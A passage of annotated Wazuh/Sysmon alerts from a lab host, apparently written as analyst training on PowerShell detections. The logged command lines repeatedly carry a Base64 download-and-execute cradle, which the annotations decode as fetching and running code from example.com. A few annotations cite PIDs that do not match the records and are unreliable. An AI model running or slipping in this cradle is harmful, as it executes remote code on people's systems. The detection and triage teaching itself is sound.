UtcTime: 2025-04-24 22:55:24.705
ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ProcessId: 14568
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_asllzuor.2bv.ps1
CreationUtcTime: 2025-04-24 22:55:24.702
User: Attacker\Attcker1" Rendered text of the Sysmon event. Every line is also parsed into a data.win.eventdata.* field below; read it here for context, search on the parsed fields.
data.win.eventdata.utcTime: 2025-04-24 22:55:24.705 When Sysmon observed the file creation, in UTC. Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-c159-680a-cb0c-000000000e00} Sysmon GUID of the creating process. Unlike a PID it is never reused, so pivot on it to find the Process Create (EID 1) event for PID 14568 and everything else that process did.
data.win.eventdata.processId: 14568 PID of the process that created the file. Ambiguous over time; prefer processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file. PowerShell itself, not a separate dropper.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_asllzuor.2bv.ps1 File that was created, and what tripped the rule: a .ps1 in %TEMP%. The __PSScriptPolicyTest_<random>.ps1 name is the probe file powershell.exe writes at start-up to test whether AppLocker/WDAC script enforcement applies, so the file is expected noise. The signal is the PowerShell instance that wrote it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:24.702 Creation timestamp on the file. Differs from utcTime by 3 ms here, which is normal; a large difference means the file existed before and was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as. Same local account as in the Process Create events.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 114 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535330.2675904 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon numbering applies to the event ID below.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across hosts.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log ID. 1 = ProcessCreate, the Sysmon counterpart of Security 4688 with hashes, GUIDs and parent details added.
data.win.system.version: 5 Schema version of this event type. ParentUser and a few other fields only exist in newer versions.
data.win.system.level: 4 Event level: 4 = Informational. Severity comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:27.5487001Z When the record reached the event log, in UTC. About half a second after the UtcTime in the message, which is normal.
data.win.system.eventRecordID: 350117 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the new process (that is ProcessId 15812 in the message).
data.win.system.threadID: 4740 Writer thread inside the Sysmon service. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; the Wazuh agent must subscribe to it.
data.win.system.computer: Attacker Hostname recorded by the event log itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:27.053
ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ProcessId: 15812
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ParentProcessId: 14568
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered text of the Sysmon event; the same fields are parsed into data.win.eventdata.* below. Read it for context, search on the parsed fields.
data.win.eventdata.utcTime: 2025-04-24 22:55:27.053 When the process was created, in UTC. The authoritative timestamp for the timeline.
data.win.eventdata.processGuid: {94294ddc-c15f-680a-cf0c-000000000e00} Sysmon GUID of the new process. Never reused, so join on it: the File created (EID 11) alert that follows carries this GUID, and the next Process Create names it as ParentProcessGuid.
data.win.eventdata.processId: 15812 PID of the new process. PIDs are recycled, so prefer processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable: the Windows PowerShell 5.1 binary. Compare with originalFileName and hashes to rule out a renamed or patched copy.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the image's version resource. Trivially spoofable in a custom binary; confirm with hashes.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource. Same caveat.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource. Same caveat.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Differs from the image name when a LOLBin has been renamed; identical here.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line as launched. powershell.exe is handed its own path as the first argument, then -NoLogo -NoProfile -EncodedCommand <blob>. The blob is Base64 over UTF-16LE; decoded it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle, which is why the rule maps to T1059.001. Decode before triage; never judge an encoded command by its length alone.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as: local user Attcker1 on host Attacker (for local accounts the hostname stands in for the domain).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} GUID of the logon session. Shared by every Sysmon event from this session, so use it to pull everything the session did.
data.win.eventdata.logonId: 0x26584 Hex logon session ID. The same value appears as Logon ID in Security event 4624, which tells you how and when Attcker1 signed in.
data.win.eventdata.terminalSessionId: 1 Windows session number. 0 is services; 1 and up are interactive desktops, so this came from a console or RDP session, not a service.
data.win.eventdata.integrityLevel: Medium Token integrity. Medium is a standard, non-elevated user; High would be UAC-elevated, System a service context.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC SHA256 of the image file (powershell.exe), not of the script. Identical across the Process Create events here, as expected for the same binary; check it against a known-good copy from the same build.
data.win.eventdata.parentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} Sysmon GUID of the parent. It matches processGuid of the previous Process Create alert (PID 14568), so this is the next link in a chain of PowerShell instances each launching another.
data.win.eventdata.parentProcessId: 14568 PID of the parent. Only meaningful together with the GUID.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable. PowerShell spawned from PowerShell is exactly the pattern rule 92057 looks for.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA The parent's command line. Identical to this process's commandLine, encoded blob included: each instance in this chain launches another copy of itself with the same arguments, which is why rule.firedtimes keeps climbing.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account of the parent. Same user, so no privilege change across the hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline, then check targetFilename: here it is PowerShell's own __PSScriptPolicyTest start-up probe in %TEMP%, not a transferred tool, so the T1105 mapping is the rule's guess. The finding is the PowerShell instance (PID 15812, the process from the alert just above) that created it.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 118 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535330.2683975 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon numbering applies to the event ID below.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across hosts.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log ID. 11 = FileCreate.
data.win.system.version: 2 Schema version of this event type.
data.win.system.level: 4 Event level: 4 = Informational. Severity comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon it mirrors the event ID (11 = File created).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:27.7747838Z When the record was written to the event log, in UTC. Tens of milliseconds after the UtcTime in the message, which is normal.
data.win.system.eventRecordID: 350118 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the creating process (that is ProcessId 15812 in the message).
data.win.system.threadID: 4740 Writer thread inside the Sysmon service. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; the Wazuh agent must subscribe to it.
data.win.system.computer: Attacker Hostname recorded by the event log itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:27.733
ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ProcessId: 15812
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bpcztlkl.1e1.ps1
CreationUtcTime: 2025-04-24 22:55:27.733
User: Attacker\Attcker1" Rendered text of the Sysmon event; the same fields are parsed into data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:55:27.733 When Sysmon observed the file creation, in UTC. About 0.7 s after the Process Create for the same PID, i.e. during PowerShell start-up.
data.win.eventdata.processGuid: {94294ddc-c15f-680a-cf0c-000000000e00} Sysmon GUID of the creating process. Same GUID as the Process Create alert above for PID 15812, so the two alerts describe one process.
data.win.eventdata.processId: 15812 PID of the process that created the file. Prefer processGuid for pivots.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file: PowerShell itself.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bpcztlkl.1e1.ps1 File that was created. Another __PSScriptPolicyTest_<random>.ps1, the AppLocker/WDAC probe powershell.exe writes to %TEMP% at start-up; one per PowerShell launch, which is why this rule fires once for every hop in the chain.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:27.733 Creation timestamp on the file. Equal to utcTime, so the file was new, not overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as. Same local account as the Process Create events.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 115 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535333.2686744 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon numbering applies to the event ID below.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across hosts.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log ID. 1 = ProcessCreate, the Sysmon counterpart of Security 4688.
data.win.system.version: 5 Schema version of this event type.
data.win.system.level: 4 Event level: 4 = Informational. Severity comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:30.8278138Z When the record reached the event log, in UTC. About 1.6 s after the UtcTime in the message; the host was busy spawning PowerShell instances, so some lag is expected.
data.win.system.eventRecordID: 350142 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the new process (that is ProcessId 5124 in the message).
data.win.system.threadID: 4740 Writer thread inside the Sysmon service. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; the Wazuh agent must subscribe to it.
data.win.system.computer: Attacker Hostname recorded by the event log itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:29.220
ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ProcessId: 5124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ParentProcessId: 15812
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered text of the Sysmon event; the same fields are parsed into data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:55:29.220 When the process was created, in UTC. About 2.2 s after the previous hop (PID 15812 at 22:55:27.053): the chain is spawning a new PowerShell every couple of seconds.
data.win.eventdata.processGuid: {94294ddc-c161-680a-d10c-000000000e00} Sysmon GUID of the new process. Join on it to find this process's own File created event and any further children.
data.win.eventdata.processId: 5124 PID of the new process. PIDs are recycled, so prefer processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable: the Windows PowerShell 5.1 binary.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Description string from the version resource. Spoofable; confirm with hashes.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource. Same caveat.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource. Same caveat.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary; matches the image name, so this is not a renamed LOLBin.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line as launched. Same encoded blob as every other hop; decoded (Base64 over UTF-16LE) it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). The URL is the indicator to take to proxy and DNS logs.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as: local user Attcker1 on host Attacker.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} GUID of the logon session. Unchanged across the whole chain, so one logon session is responsible for all of it.
data.win.eventdata.logonId: 0x26584 Hex logon session ID. Matches the Logon ID in Security event 4624 for this session.
data.win.eventdata.terminalSessionId: 1 Windows session number. An interactive desktop session, not a service.
data.win.eventdata.integrityLevel: Medium Token integrity. Still a standard, non-elevated user; nothing in this chain has escalated.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC SHA256 of the image file (powershell.exe). Identical to the earlier hops, as expected for the same binary.
data.win.eventdata.parentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} Sysmon GUID of the parent. It matches processGuid of the previous Process Create alert (PID 15812), so the chain now runs 14832 -> 14568 -> 15812 -> 5124 across the alerts on this page.
data.win.eventdata.parentProcessId: 15812 PID of the parent. Only meaningful together with the GUID.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent executable. PowerShell spawned from PowerShell, the pattern rule 92057 matches on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA The parent's command line. Identical to this process's commandLine, so each hop re-launches the same encoded cradle; kill the whole tree by logonGuid rather than one PID.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account of the parent. Same user, so no privilege change across the hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline, then check targetFilename: again PowerShell's own __PSScriptPolicyTest start-up probe in %TEMP%, written by PID 5124 from the alert just above. Treat this alert as a marker that another PowerShell started, not as evidence of a dropped tool.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 119 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535333.2694811 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon numbering applies to the event ID below.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across hosts.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log ID. 11 = FileCreate.
data.win.system.version: 2 Schema version of this event type.
data.win.system.level: 4 Event level: 4 = Informational. Severity comes from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon it mirrors the event ID (11 = File created).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:31.1496733Z When the record was written to the event log, in UTC. Tens of milliseconds after the UtcTime in the message, which is normal.
data.win.system.eventRecordID: 350143 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the creating process (that is ProcessId 5124 in the message).
data.win.system.threadID: 4740 Writer thread inside the Sysmon service. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; the Wazuh agent must subscribe to it.
data.win.system.computer: Attacker Hostname recorded by the event log itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:31.110
ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ProcessId: 5124
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ssbpiznj.l5y.ps1
CreationUtcTime: 2025-04-24 22:55:31.110
User: Attacker\Attcker1" Rendered text of the Sysmon event; the same fields are parsed into data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:55:31.110 When Sysmon observed the file creation, in UTC. About 1.9 s after the Process Create for the same PID, during PowerShell start-up.
data.win.eventdata.processGuid: {94294ddc-c161-680a-d10c-000000000e00} Sysmon GUID of the creating process. Same GUID as the Process Create alert above for PID 5124.
data.win.eventdata.processId: 5124 PID of the process that created the file. Prefer processGuid for pivots.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file: PowerShell itself.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ssbpiznj.l5y.ps1 File that was created. The third __PSScriptPolicyTest_<random>.ps1 in a row, one per PowerShell launch. Tune the rule to exclude this name pattern so that a real .ps1 or .exe landing in %TEMP% stands out.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:31.110 Creation timestamp on the file. Equal to utcTime, so the file was new, not overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as. Same local account throughout.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 116 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
